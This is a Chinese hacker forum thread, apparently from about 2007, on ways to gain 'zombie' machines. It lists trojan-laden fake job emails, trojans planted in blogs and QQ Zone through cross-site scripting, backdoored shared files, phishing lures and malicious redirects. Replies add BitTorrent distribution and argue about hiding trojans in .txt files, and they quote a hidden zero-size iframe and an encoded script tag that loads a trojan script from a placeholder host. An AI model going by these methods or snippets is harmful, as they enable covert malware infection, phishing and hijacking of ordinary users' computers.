Board logo

标题: [讨论]得肉鸡的艺术 [打印本页]

作者: valen886    时间: 2008-7-23 08:31     标题: [讨论]得肉鸡的艺术

[讨论]得肉鸡的艺术
议题作者:别动我飘着呢
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

(根据黑客行为特征可有以下几中表现形式:
1.恶作剧型 喜欢进入他人网址,以删除某些文字或图象,篡改网址主页信息来显示自己高超自娱或娱人,或者进入他人网址内,将其主页内商品资料内容,价格做降价等大幅度修改,使消费者以为该公司的商品价格廉价而大量订购,从而产生Internet定货纠纷。
2.隐蔽性攻击型 隐蔽在暗处以匿名身份对网络发动攻击型行为,往往不易被人识破,或者干脆冒充网络合法用户,侵入网络‘行黑’,该种行为由于是在暗处实施的主动攻击型行为,因此对社会危害极大。
3.定时************型指的就是网络内部人员的非法行为,他们在实施时故意在网络上布下陷阱或故意在网络维护软件内安插逻辑************或后门程序,在特定的时间或特定条件下,引发一条列具有连锁反应性质的破坏行动,或干扰网络正常运行或致使网络完全瘫痪。
4.矛盾制造型 非法进入他人网络,修改其电子邮件的内容或厂商签约日期,进而破坏甲乙双方交易,并借此方式了解双方商谈的报价价格,乘机介入其商品竞争。有些黑客还利用政府上网的机会,修改公众信息,造成社会矛盾和动乱,严重者可颠覆国家和军队。
5.职业杀手型 此种黑客一职业杀手著称,经常一监控方式将他人网址内由国外传来的资料迅速删除,使得原网址使用公司无法得知国外最新资料或定单,亦或者将电脑病毒植入他人网络内,使其网络无法正常运行。
6.业余爱好者 计算机爱好者受到好奇心驱使,往往在技术上追求精益求精,丝毫未感自己的行为对他人造成影响,属于无意性攻击型行为。这种人可以帮助某些内部网堵塞和防止损失扩大。有些爱好者还能够帮助政府部门修正网络错误。因此,这类黑客的出现并非是坏事,至少他们的本意无反社会的色彩,只是受到好奇心驱使而已。)此段内容来源网络,非本人总结和原创,澄清一下~:)、
  不管那种,几乎都离不开得肉鸡的目标,现在网上得肉鸡的几种方法,本人做了一下终结/:
  1。根据WEB漏洞,服务器漏洞,得服务器肉鸡,网站挂马等/`
    2。以求职信的方法得肉鸡,谎称自己 是某公司设计人员,附件添加木马或信中穿插木马页面,带有很强的目标性。
  3。利用现在网上提供的免费的个人BLOG,个人站点挂马,因为这些服务几乎无一例外的有跨站漏洞和可执行用户添加的代码,(如黑防看到ZYH的中国博客网就存在典型的跨站漏洞)
  4。QQ空间挂马,原理同3一样~
    5。网上提供免费的网盘,如大名顶鼎的G盘,可以让别人免费共享你的软件,绑后门是最常见不过的,跟在大型黑站绑后门一样的,给自己的作品绑上一个后门,虽然可行,但是贬低了自己的人品,本人觉的不适合做人的基本准则。
  6。群里有共享,垃圾群,我就喜欢绑上木马后走人,当然信息要有敏感性和诱惑性,骗对方打开才是上上策
  7,最近QQ挖掘鸡好像用的人很多,利用站点多设置一些敏感字,制造钓鱼平台,关键字段含有/QQ。TXT,诱骗用户通过引擎浏览你的站,中招,总结就是利用现在目前流行的敏感信息构造
钓鱼平台,或者是漏洞,这个跟钓鱼站点送5-6位QQ号发送给你的好友的号码的原理是一样的,思路是这样大家可以自己构造。
  8,各大引擎都有自己的贴吧,给那些寻求帮助的人发送虚假信息
(挂马的站点,再跳转真实站点,这个在代码里不难实现吧),论坛里有好多支持代码执行的论坛,典型的是BBSXP,这个在FTP空间论坛里可以看到~~~
   我暂时就想到这些,藐似一个方法,都是骗人~~~
  PS:我超级菜鸟,欢迎藐视我,HOHO偶的烂LOG :http://blog.yesky.com/Blog/yanfeics/


帖子66 精华2 积分158 阅读权限40 性别女 在线时间139 小时 注册时间2006-8-24 最后登录2007-7-5 查看个人网站
查看详细资料TOP 爱要怎么说出口

网络幽灵
晶莹剔透§烈日灼然
作者: LOVE    时间: 2008-7-23 08:31

总结得不错··[s:39]
还有影视MTV嵌入挂马
BT传播
多着呐…………^_^    社会需求将决定你的价值    ^_^

帖子55 精华2 积分231 阅读权限40 性别男 在线时间130 小时 注册时间2005-7-1 最后登录2008-7-10 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

笨木偶
晶莹剔透§烈日灼然
作者: liuyi008    时间: 2008-7-23 08:31

可以在肉鸡上下载 BT,剩着本机的资源,呵呵~
帖子13 精华0 积分49 阅读权限40 在线时间140 小时 注册时间2005-3-26 最后登录2008-6-25 查看详细资料TOP 少女暴富的隐秘(图)

无敌小龙
荣誉会员

作者: 小枫    时间: 2008-7-23 08:31

mdb挂马,doc挂吗,txt格式挂马还米听过无敌小龙
http://hi.baidu.com/pespin
帖子39 精华2 积分3299 阅读权限100 在线时间22 小时 注册时间2006-9-11 最后登录2008-7-4 查看详细资料TOP

liiro
晶莹剔透§烈日灼然
作者: dghgs    时间: 2008-7-23 08:31

哎,方法是不少,
但是得了肉鸡又怎么样...
好像没有太大的利用价值..
难道去攻击服务器?..
呵呵,我是不会做那种无聊的事情..
PS:我也是菜鸟.物是人非
帖子8 精华0 积分30 阅读权限40 性别男 在线时间9 小时 注册时间2006-10-26 最后登录2007-7-6 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

别动我飘着呢
晶莹剔透§烈日灼然
作者: 雄蟹    时间: 2008-7-23 08:31

楼上说的藐视可以用迅雷的注册账号(达到上校的登记可以发布软件或者游戏什么的,)感觉跟挂马在迅雷首页没什么区别~~~~~~~~~偶的烂LOG :http://blog.yesky.com/Blog/yanfeics/

帖子66 精华2 积分158 阅读权限40 性别女 在线时间139 小时 注册时间2006-8-24 最后登录2007-7-5 查看个人网站
查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

zq980434
晶莹剔透§烈日灼然
作者: zhangrong    时间: 2008-7-23 08:31

我是个业余爱好者,还要和你们多学习,这些得肉鸡的方法我都没有试过
帖子1 精华0 积分6 阅读权限40 在线时间0 小时 注册时间2007-1-17 最后登录2007-3-8 查看详细资料TOP 让女孩一夜变的更有女人味

seaven
晶莹剔透§烈日灼然
作者: 没没    时间: 2008-7-23 08:31

引用:
引用第5楼无敌小龙于2007-01-18 14:17发表的:
mdb挂马,doc挂吗,txt格式挂马还米听过
TXT也能挂马,第一次听说? [s:66]http://www.seaven.org http://forum.dswhack.com is your friend

帖子60 精华0 积分215 阅读权限40 性别男 在线时间383 小时 注册时间2006-11-28 最后登录2008-7-11 查看个人网站
查看详细资料TOP

control
晶莹剔透§烈日灼然
作者: WKS    时间: 2008-7-23 08:31

引用:
引用第12楼hallz于2007-01-20 23:30发表的:
说白了就两个字
利益
呵呵``
  抓肉鸡的方法太多了``
  我们活在技术的世界``
  不能沉溺于去抓肉鸡`
  当然利益的吸引也是很大的``
  - -``这就需要定位好了!
`````hack≠creak!``
  HOHO```
  多申请点大论坛```然后可以上传附件的的啊``
   去把鸽子传进去``
  哈哈!`````````
[s:35]  TXT确实可以挂``
  只是这种技术好象被高人利用``
   我是只菜鸟`
  不晓得哈```
                                            如果上天可以再给我一次机会`
  我想大声的说``TXT怎么搞马啊```````````````````````````
  别动我!!!!!!!!!!!!!!老娘我飘着呢````````````Blog:Www.DayRoad.cn
帖子22 精华2 积分89 阅读权限40 在线时间106 小时 注册时间2007-1-10 最后登录2008-4-21 查看详细资料TOP

sunny6086
晶莹剔透§烈日灼然
作者: POLO劲情~怀    时间: 2008-7-23 08:31

txt真的可以挂马,今天我卡吧就杀到了这种马

不相信的大家可以去下载 那个 “看雪论坛。。。。。的技术总结” 我下好了,卡吧就跳出来了,说是 。。。。TXT是木马后门,当时我就晕了,这种格式也好挂马,那岂不是要天下大乱了?
帖子1 精华0 积分6 阅读权限40 性别男 在线时间0 小时 注册时间2007-1-11 最后登录2007-5-31 查看详细资料TOP

fhod
运维管理组

作者: 强劲力量    时间: 2008-7-23 08:31

引用:
引用第8楼seaven于2007-01-19 22:15发表的:


TXT也能挂马,第一次听说? [s:66]
TXT可以用来挂马的..以前在讨论版块里也讨论过这个问题,
QQ木马反击站里,这个贴里我也有提到过..

txt里加如html代码是可以当作html来执行的..不信就找个html的代码..然后改html后缀为txt上传空间里
照样可以执行.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料TOP

pixy
荣誉会员

作者: gggxxx    时间: 2008-7-23 08:31

引用:
引用第15楼fhod于2007-02-03 19:24发表的:


TXT可以用来挂马的..以前在讨论版块里也讨论过这个问题,
QQ木马反击站里,这个贴里我也有提到过..

.......
真的假的..txt可以在网页执行木马程序?

比如<iframe src="木马地址" width="0" height="0" frameborder="0"></iframe> 可以执行?与狼共舞!

帖子395 精华10 积分4278 阅读权限100 性别男 来自China 在线时间284 小时 注册时间2007-1-3 最后登录2008-7-18 查看详细资料TOP

别动我飘着呢
晶莹剔透§烈日灼然
作者: 彬彬    时间: 2008-7-23 08:31

引用:
引用第19楼xh于2007-02-05 20:48发表的:
你滴blog好像用了第3条“利用现在网上提供的免费的个人BLOG,个人站点挂马”艾。。。。
报告楼上滴,首先可以肯定你一定是高手(现在不是以后一定是),其二,你很仔细,但是我跟冰冰说过,挂马,我测试一下效果,但是,那个马是无效的,大家可以仔细观察一下,或者坚挺本地的连接~~
无效的马,呵呵,加我的QQ,有礼物送你~~偶的烂LOG :http://blog.yesky.com/Blog/yanfeics/

帖子66 精华2 积分158 阅读权限40 性别女 在线时间139 小时 注册时间2006-8-24 最后登录2007-7-5 查看个人网站
查看详细资料TOP

别动我飘着呢
晶莹剔透§烈日灼然
作者: songzihui    时间: 2008-7-23 08:31

引用:
引用第8楼seaven于2007-01-19 22:15发表的:


TXT也能挂马,第一次听说? [s:66]
三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。
冰,斑竹加钱吧~~~偶的烂LOG :http://blog.yesky.com/Blog/yanfeics/

帖子66 精华2 积分158 阅读权限40 性别女 在线时间139 小时 注册时间2006-8-24 最后登录2007-7-5 查看个人网站
查看详细资料TOP

wsnm
晶莹剔透§烈日灼然
作者: 冲红灯    时间: 2008-7-23 08:31

还不会 学习中  [s:41]
帖子1 精华0 积分6 阅读权限40 性别男 来自深圳 在线时间0 小时 注册时间2007-2-9 最后登录2007-2-9 查看详细资料TOP

ppxb6648
晶莹剔透§烈日灼然
作者: brahmana    时间: 2008-7-23 08:31

TNND.现在挂马都强着呢.RM挂着.Q-ZONE挂着.XUNLEI挂着....真的.很不爽..动不动就中马....
帖子1 精华0 积分6 阅读权限40 在线时间0 小时 注册时间2007-2-10 最后登录2008-6-6 查看详细资料TOP

坦丁
晶莹剔透§烈日灼然
作者: 热带牛仔    时间: 2008-7-23 08:31

我认为是实际的扩展名字不是TXT吧!或者说伪装成TXT。一念天堂,一念地狱。
帖子4 精华0 积分43 阅读权限40 来自CHINA 在线时间0 小时 注册时间2005-11-6 最后登录2007-6-22 查看详细资料TOP

longsan168
晶莹剔透§烈日灼然
作者: QQ小敏    时间: 2008-7-23 08:31

3。利用现在网上提供的免费的个人BLOG,个人站点挂马,因为这些服务几乎无一例外的有跨站漏洞和可执行用户添加的代码`,(这个我用得多)

8,各大引擎都有自己的贴吧,给那些寻求帮助的人发送虚假信息(这个好象没用过吧。)

主要是BT传播
帖子5 精华0 积分20 阅读权限40 性别男 在线时间0 小时 注册时间2007-2-15 最后登录2007-10-22 查看详细资料TOP

alavin
晶莹剔透§烈日灼然
作者: 豆粒    时间: 2008-7-23 08:31

jpg 好像也可以挂马的?签名

帖子5 精华0 积分20 阅读权限40 性别男 在线时间38 小时 注册时间2006-3-13 最后登录2008-7-8 查看个人网站
查看详细资料TOP

gzy21cn
晶莹剔透§烈日灼然
作者: 福州巧克力    时间: 2008-7-23 08:31

挂马我的一点理解:一,在网上挂马,让别人访问然后马儿下载到本地执行。
二,让马儿在本地从一个文件中释放出来并执行(图标和名称可以任意取的)。那么这个文件应该是可执行的,或者有隐藏后缀,或者关联打开?   
我是刚刚学习这些,不是很了解,请原谅!希望有高手指点。
帖子9 精华0 积分31 阅读权限40 性别男 在线时间21 小时 注册时间2007-2-18 最后登录2008-7-15 查看详细资料TOP

janphu
晶莹剔透§烈日灼然
作者: 青蛙    时间: 2008-7-23 08:31

以前下电影时候..有看过一种挂法..就是把两个电影文件..合并成屏保格式的文件...超强.....就是运行后全自释放出来...不懂这是怎么个挂法原理呀
帖子1 精华0 积分6 阅读权限40 性别男 在线时间2 小时 注册时间2007-2-27 最后登录2007-9-2 查看详细资料TOP

黑77
晶莹剔透§烈日灼然
作者: Laken    时间: 2008-7-23 08:31

有关TXT挂马,我还做了一个教程,

大家不懂的有兴趣可以看下

没什么技术含量……

http://www.520hack.com/donghua/donghua1/200702/4724.html
帖子7 精华0 积分27 阅读权限40 性别男 在线时间9 小时 注册时间2007-1-10 最后登录2007-11-28 查看详细资料TOP

asm
运维管理组

作者: zsxdsl    时间: 2008-7-23 08:31

txt挂马其实就和把一张图片换了后缀,调用图片察看器打开,照样能看到图片一样......表面上看到的是txt格式的伪装.........游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn
帖子1598 精华30 积分8742 阅读权限150 性别男 在线时间954 小时 注册时间2006-9-21 最后登录2008-7-20 查看详细资料TOP

黑77
晶莹剔透§烈日灼然
作者: joe88    时间: 2008-7-23 08:31

引用:
引用第30楼asm于2007-03-05 03:54发表的:
txt挂马其实就和把一张图片换了后缀,调用图片察看器打开,照样能看到图片一样......表面上看到的是txt格式的伪装.........
错,TXT挂马不是把一张图片换了后缀

而是把网页文件换了后缀……
帖子7 精华0 积分27 阅读权限40 性别男 在线时间9 小时 注册时间2007-1-10 最后登录2007-11-28 查看详细资料TOP

一挥衣袖
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2